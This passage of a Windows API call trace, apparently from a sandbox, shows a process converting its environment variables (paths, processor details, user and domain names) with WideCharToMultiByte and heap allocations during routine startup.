lpUsedDefaultChar=0x0) returned 36 [0102.460] GetLastError () returned 0x0 [0102.460] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7512c0, Size=0x20) returned 0x7512c0 [0102.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0102.461] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x14) returned 0x751240 [0102.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x751240, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0102.461] GetLastError () returned 0x0 [0102.461] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7512c0, Size=0x24) returned 0x7512c0 [0102.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.461] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0xd) returned 0x74e6c0 [0102.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x74e6c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0102.461] GetLastError () returned 0x0 [0102.461] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7512c0, Size=0x28) returned 0x7512c0 [0102.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0102.461] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x25) returned 0x74aa68 [0102.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x74aa68, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0102.461] GetLastError () returned 0x0 [0102.461] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7512c0, Size=0x2c) returned 0x7512c0 [0102.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0102.461] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x39) returned 0x745050 [0102.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x745050, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0102.461] GetLastError () returned 0x0 [0102.461] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7512c0, Size=0x30) returned 0x7512c0 [0102.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0102.461] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x18) returned 0x7512f8 [0102.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x7512f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0102.462] GetLastError () returned 0x0 [0102.462] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7512c0, Size=0x34) returned 0x751318 [0102.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0102.462] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x17) returned 0x7512c0 [0102.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x7512c0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0102.462] GetLastError () returned 0x0 [0102.462] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x751318, Size=0x38) returned 0x751318 [0102.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.462] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0xe) returned 0x74e6d8 [0102.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x74e6d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0102.462] GetLastError () returned 0x0 [0102.462] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x751318, Size=0x3c) returned 0x751318 [0102.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0102.462] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x69) returned 0x751360 [0102.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x751360, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0102.462] GetLastError () returned 0x0 [0102.462] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x751318, Size=0x40) returned 0x751318 [0102.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0102.462] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x3e) returned 0x745098 [0102.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x745098, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0102.462] GetLastError () returned 0x0 [0102.462] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x751318, Size=0x44) returned 0x7513d8 [0102.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0102.463] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x1b) returned 0x74f110 [0102.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x74f110, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0102.463] GetLastError () returned 0x0 [0102.463] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7513d8, Size=0x48) returned 0x7513d8 [0102.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0102.463] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x1d) returned 0x74f138 [0102.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x74f138, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0102.463] GetLastError () returned 0x0 [0102.463] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7513d8, Size=0x4c) returned 0x7513d8 [0102.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0102.463] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x48) returned 0x746c08 [0102.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x746c08, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0102.463] GetLastError () returned 0x0 [0102.463] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7513d8, Size=0x50) returned 0x7513d8 [0102.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0102.463] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x12) returned 0x751318 [0102.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x751318, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0102.463] GetLastError () returned 0x0 [0102.463] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7513d8, Size=0x54) returned 0x7513d8 [0102.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0102.463] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x18) returned 0x751338 [0102.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x751338, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0102.463] GetLastError () returned 0x0 [0102.464] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7513d8, Size=0x58) returned 0x7513d8 [0102.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0102.464] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x1b) returned 0x74f160 [0102.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x74f160, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0102.464] GetLastError () returned 0x0 [0102.464] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7513d8, Size=0x5c) returned 0x7513d8 [0102.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0102.464] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x24) returned 0x74aa98 [0102.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x74aa98, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0102.464] GetLastError () returned 0x0 [0102.464] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7513d8, Size=0x60) returned 0x7513d8 [0102.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0102.464] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x29) returned 0x74b1a8 [0102.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x74b1a8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0102.464] GetLastError () returned 0x0 [0102.464] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7513d8, Size=0x64) returned 0x7513d8 [0102.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0102.464] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x1e) returned 0x74f188 [0102.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x74f188, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0102.464] GetLastError () returned 0x0 [0102.464] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7513d8, Size=0x68) returned 0x7513d8 [0102.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0102.464] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x41) returned 0x746c58 [0102.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x746c58, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0102.464] GetLastError () returned 0x0 [0102.465] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7513d8, Size=0x6c) returned 0x7513d8 [0102.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0102.465] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x17) returned 0x751450 [0102.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x751450, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0102.465] GetLastError () returned 0x0 [0102.465] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7513d8, Size=0x70) returned 0x7513d8 [0102.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0102.465] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0xf) returned 0x74e6f0 [0102.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x74e6f0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0102.465] GetLastError () returned 0x0 [0102.465] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7513d8, Size=0x74) returned 0x751470 [0102.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0102.465] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x16) returned 0x7513d8 [0102.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x7513d8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0102.465] GetLastError () returned 0x0 [0102.465] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x751470, Size=0x78) returned 0x751470 [0102.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0102.465] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x2a) returned 0x74b1e0 [0102.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x74b1e0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0102.465] GetLastError () returned 0x0 [0102.465] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x751470, Size=0x7c) returned 0x751470 [0102.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0102.466] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x29) returned 0x74b218 [0102.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x74b218, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0102.466] GetLastError () returned 0x0 [0102.466] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x751470, Size=0x80) returned 0x751470 [0102.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.466] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x15) returned 0x7513f8 [0102.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x7513f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0102.466] GetLastError () returned 0x0 [0102.466] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x751470, Size=0x84) returned 0x751470 [0102.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0102.466] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x1e) returned 0x74f1b0 [0102.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x74f1b0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0102.466] GetLastError () returned 0x0 [0102.466] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x751470, Size=0x88) returned 0x751470 [0102.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0102.466] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x2a) returned 0x74b250 [0102.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x74b250, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0102.466] GetLastError () returned 0x0 [0102.466] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x751470, Size=0x8c) returned 0x751470 [0102.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0102.466] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x12) returned 0x751418 [0102.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x751418, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0102.466] GetLastError () returned 0x0 [0102.467] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x751470, Size=0x90) returned 0x751470 [0102.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0102.467] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x18) returned 0x751508 [0102.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x751508, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0102.467] GetLastError () returned 0x0 [0102.467] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x751470, Size=0x94) returned 0x751528 [0102.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 